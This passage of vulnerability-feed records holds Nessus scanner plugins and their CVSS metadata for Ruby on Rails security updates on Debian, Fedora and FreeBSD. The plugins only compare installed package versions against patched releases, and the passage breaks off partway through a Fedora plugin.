"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3226", "CVE-2015-3227", "CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3464.NASL", "href": "https://www.tenable.com/plugins/nessus/88499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3464. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88499);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-3226\",\n \"CVE-2015-3227\",\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"DSA\", value:\"3464\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Debian DSA-3464-1 : rails - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple security issues have been discovered in the Ruby on Rails web\napplication development framework, which may result in denial of\nservice, cross-site scripting, 
information disclosure or bypass of\ninput validation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/rails\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2016/dsa-3464\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 2:4.1.8-1+deb8u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-15T14:12:31", "description": "Andrew Carpenter of Critical Juncture discovered a cross-site scripting vulnerability affecting Action View in rails, a web application framework written in Ruby. 
Text declared as 'HTML safe' will not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-26T00:00:00", "type": "nessus", "title": "Debian DSA-3651-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3651.NASL", "href": "https://www.tenable.com/plugins/nessus/93114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3651. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93114);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"DSA\", value:\"3651\");\n\n script_name(english:\"Debian DSA-3651-1 : rails - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrew Carpenter of Critical Juncture discovered a cross-site\nscripting vulnerability affecting Action View in rails, a web\napplication framework written in Ruby. Text declared as 'HTML safe'\nwill not have quotes escaped when used as attribute values in tag\nhelpers.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=834155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3651\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-15T14:12:24", "description": "- Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionview (2016-ab8bf51cf3)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": 
"FEDORA_2016-AB8BF51CF3.NASL", "href": "https://www.tenable.com/plugins/nessus/93143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-ab8bf51cf3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93143);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"FEDORA\", value:\"2016-ab8bf51cf3\");\n\n script_name(english:\"Fedora 23 : rubygem-actionview (2016-ab8bf51cf3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-ab8bf51cf3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-6.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:40:07", "description": "Ruby Security team reports :\n\nThere is a possible XSS vulnerability in Action View. Text declared as 'HTML safe' will not have quotes escaped when used as attribute values in tag helpers. 
This vulnerability has been assigned the CVE identifier CVE-2016-6316.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "nessus", "title": "FreeBSD : Rails 4 -- Possible XSS Vulnerability in Action View (43f1c867-654a-11e6-8286-00248c0c745d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionview", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_43F1C867654A11E6828600248C0C745D.NASL", "href": "https://www.tenable.com/plugins/nessus/94081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94081);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6316\");\n\n script_name(english:\"FreeBSD : Rails 4 -- Possible XSS Vulnerability in Action View (43f1c867-654a-11e6-8286-00248c0c745d)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby Security team reports :\n\nThere is a possible XSS vulnerability in Action View. Text declared as\n'HTML safe' will not have quotes escaped when used as attribute values\nin tag helpers. 
This vulnerability has been assigned the CVE\nidentifier CVE-2016-6316.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://groups.google.com/forum/#!topic/ruby-security-ann/8B2iV2tPRSE\"\n );\n # https://vuxml.freebsd.org/freebsd/43f1c867-654a-11e6-8286-00248c0c745d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4ba1a05\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview>3.0.0<4.2.7.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-26T15:28:30", "description": "- Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Fedora 24 : rubygem-actionview (2016-0d9890f7b5)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-0D9890F7B5.NASL", "href": "https://www.tenable.com/plugins/nessus/93137", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-0d9890f7b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93137);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\");\n script_xref(name:\"FEDORA\", value:\"2016-0d9890f7b5\");\n\n script_name(english:\"Fedora 24 : rubygem-actionview (2016-0d9890f7b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix for CVE-2016-6316 (rhbz#1366480)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-0d9890f7b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
